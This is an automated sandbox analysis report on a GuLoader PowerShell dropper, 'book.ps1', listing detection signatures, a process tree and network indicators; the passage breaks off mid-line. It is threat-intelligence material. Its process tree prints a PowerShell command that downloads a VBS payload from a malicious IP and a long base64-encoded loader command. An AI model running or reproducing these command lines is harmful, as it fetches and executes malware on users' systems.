Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
book.ps1

Overview

General Information

Sample Name:book.ps1
Analysis ID:623683
MD5:10c1a6b6135d5f641ed56cfde0da1967
SHA1:dbf7d6327c2bf13f3ae772f6eaaa1c0a5fc5473e
SHA256:75de1e1b097579bf1a18c494042b16192a969dfb0fb9cdb3759d362b7b4b6a5f
Tags:Guloaderps1
Infos:

Detection

GuLoader
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected GuLoader
Wscript starts Powershell (via cmd or directly)
Encrypted powershell cmdline option found
Very long command line found
Potential dropper URLs found in powershell memory
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Drops PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

  • System is w10x64
  • powershell.exe (PID: 3144 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\book.ps1 MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 1716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6344 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -uri http://46.4.198.55/10P/Sursdepa.vbs -o Sursdepa.vbs MD5: 95000560239032BC68B4C2FDFCDEF913)
    • wscript.exe (PID: 6948 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Sursdepa.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
      • powershell.exe (PID: 6276 cmdline: C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAZABmAGQAdAB0AG8AbgAgAFMAdAB2AG4AZQAgAFoAaQBuAGMAZQBkACAASQBOAEQAUwBUAFQAIABNAGUAdAB0AGEAcgB0AGEAbQBnADcAIABTAGEAbABhACAAYwBlAGIAYQBsACAARgBPAFIAUwBUACAATwBzAHQAZQBvAGwAaQB0ADEAIABVAG4AZABpAHMAYwBvAHUANgAgAEEAZAByAGUAcwBzAGEAIABDAGEAbgBhAGQAaQA5ACAATwBWAEUAUgBUAEEATABFACAAQgBlAG0AZQAgAGQAZQBzAHQAcgB1AGsAdABpACAATwBTAFQARQBBAE4AUgBFAFQATgAgAEQAcgBpAGYAdABzAHMAdAB5AHIAMQAgAEkATgBEAEwARQBEAEUATgBEAEUAIABCAGEAZwB0ADcAIABCAEEAUgBTAEwARQBEAEUAUwAgAE8ATwBQAEgATwAgAEwAYQBjAGUAZAA5ACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAASABlAHgAYQBzAHQAaQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABCAGEAZwBmAHUAbABzADUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAQgBhAGcAZgB1AGwAcwA1ADIALABpAG4AdAAgAEIAYQBnAGYAdQBsAHMANQAzACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVgBBACgAaQBuAHQAIABIAGUAeABhAHMAdABpAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAGUAbQBpAHIAZQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ACwAcgBlAGYAIABJAG4AdAAzADIAIABIAGUAeABhAHMAdABpAGMAaAAsAGkAbgB0ACAAUAByAGkAbgB0ADgALABpAG4AdAAgAEgAZQB4AGEAcwB0AGkAYwBoADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAHUAaQBuAHQAIABCAGEAZwBmAHUAbABzADUANQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ADYAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMARABFAEgAQQBDAEgARQAgAFQAbwBzAHMAZQAzACAAVABlAGEAdABlAHIANgAgAGQAaQBhAGwAZQBjAHQAaQBjACAARQBOAEwASQBTAFQARQBEAFIAIABGAGQAcwBlADcAIABBAHMAdAByAG8AIABTAHcAZQByAHYAZQByADkAIABkAG8AdwBuAGUAeQAgAHIAaQBiAGgAdQBzAHQAIABUAGEAZwByACAAUwBwAHIAZwBlAHMAIABWAGkAbABsAGEANQAgAEgAZQB0AGUAcgBvAGQAeQBuADEAIABFAFUAUABMAE8ASQAgAEIAeQB0AHQAZQAzACAAcwBuAGsAZQByAGYAcgAgAEIAdQBuAGQAZwBhAHIAbgAgAHMAdAByAG0AawByAGUAZABzACAATAB0AG4AaQBuAGcAYgBpADUAIABpAG4AZABzACAAQQBpAHIAbABpAGYAdAA1ACAATwBDAFQAQQBWAEkATgBBAFYASQAgAFMAawBvAGsAbwBtAGkAcwBoAGIAIABVAGQAcgBlAG4AcwBuAGkAbgBnADUAIABUAGgAcgBhAHcAYwB5ACAATQBvAG4AbwBzAG8AZABpADUAIABpAG0AcABhAGwAZQBtAGUAIABJAG4AZABzAGEAdABzAGUAbgB0ADcAIABvAHIAZABlAG4AcwBtACAAIAANAAoAJABIAGUAeABhAHMAdABpAGMAaAAzAD0AMAA7AA0ACgAkAEgAZQB4AGEAcwB0AGkAYwBoADkAPQAxADAANAA4ADUANwA2ADsADQAKACQASABlAHgAYQBzAHQAaQBjAGgAOAA9AFsASABlAHgAYQBzAHQAaQBjAGgAMQBdADoAOgBWAEEAKAAtADEALABbAHIAZQBmAF0AJABIAGUAeABhAHMAdABpAGMAaAAzACwAMAAsAFsAcgBlAGYAXQAkAEgAZQB4AGEAcwB0AGkAYwBoADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAGUAbgBhAHQAZQByAGYAbwA9ACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVABJAE8ATABPAEcAIgApAC4AQQBjAGUAdABhAG0AaQBkAHAAaAAyAA0ACgANAAoAJABVAHQAaQBsACAAPQAgAFsAUwB5AHMAdABlAG0ALgBCAHkAdABlAFsAXQBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBdACwAJABTAGUAbgBhAHQAZQByAGYAbwAuAEwAZQBuAGcAdABoACAALwAgADIAKQANAAoADQAKAA0ACgANAAoARgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAUwBlAG4AYQB0AGUAcgBmAG8ALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAPQAyACkADQAKAAkAewANAAoAIAAgACAAIAAgACAAIAAgACQAVQB0AGkAbABbACQAaQAvADIAXQAgAD0AIABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAeQB0AGUAKAAkAFMAZQBuAGEAdABlAHIAZgBvAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAgADIAKQAsACAAMQA2ACkADQAKACAAIAAgACAAfQANAAoADQAKAA0ACgBmAG8AcgAoACQAYwBvAG4AYwBvAG0AaQB0AGEAPQAwADsAIAAkAGMAbwBuAGMAbwBtAGkAdABhACAALQBsAHQAIAAkAFUAdABpAGwALgBjAG8AdQBuAHQAIAA7ACAAJABjAG8AbgBjAG8AbQBpAHQAYQArACsAKQANAAoAewANAAoACQANAAoAWwBIAGUAeABhAHMAdABpAGMAaAAxAF0AOgA6AFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKAAkAEgAZQB4AGEAcwB0AGkAYwBoADMAKwAkAGMAbwBuAGMAbwBtAGkAdABhACwAWwByAGUAZgBdACQAVQB0AGkAbABbACQAYwBvAG4AYwBvAG0AaQB0AGEAXQAsADEAKQANAAoADQAKAH0ADQAKAFsASABlAHgAYQBzAHQAaQBjAGgAMQBdADoAOgBFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKAAkAEgAZQB4AGEAcwB0AGkAYwBoADMALAAgADAAKQANAAoADQAKAA0ACgA= MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 4084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • csc.exe (PID: 5752 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
          • cvtres.exe (PID: 1280 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5295.tmp" "c:\Users\user\AppData\Local\Temp\xtg032l3\CSC5582155B3987404B8B25346C869765C.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000E.00000002.544284081.0000000009290000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: http://46.4.198.55Avira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbshAvira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbsAvira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbsAvira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbsPROCE~Avira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs$Avira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbs0yjAvira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vAvira URL Cloud: Label: malware
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

    Networking

    barindex
    Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
    Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery8Q1
    Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
    Source: powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQueryX
    Source: global trafficHTTP traffic detected: GET /10P/Sursdepa.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 46.4.198.55Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: powershell.exe, 00000003.00000002.291993944.00000167E846B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.4.198.55
    Source: powershell.exe, 00000003.00000002.292149897.00000167E848D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.4.198.55/10P/Sursdepa.v
    Source: powershell.exe, 00000003.00000002.295924482.00000167E855C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282562516.00000167E5B18000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282734936.00000167E5D20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.283365528.00000167E7941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282654233.00000167E5B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs
    Source: powershell.exe, 00000003.00000002.282555129.00000167E5B10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282734936.00000167E5D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs
    Source: powershell.exe, 00000003.00000002.301030775.00000167FFDE7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.281332697.00000167FFDE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs$
    Source: powershell.exe, 00000003.00000002.282784282.00000167E5E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbsPROCE~
    Source: powershell.exe, 00000003.00000002.283365528.00000167E7941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs0yj
    Source: powershell.exe, 00000003.00000002.282562516.00000167E5B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbsh
    Source: powershell.exe, 00000003.00000002.291993944.00000167E846B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.4.198.55x
    Source: powershell.exe, 00000001.00000002.335374156.00000211CEF07000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.300317707.00000167FFBBB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.281232280.00000167FFBBB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.528421591.0000000002D8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 00000001.00000002.323271463.00000211B7732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
    Source: powershell.exe, 00000001.00000002.334605555.00000211C6F52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.319640353.0000021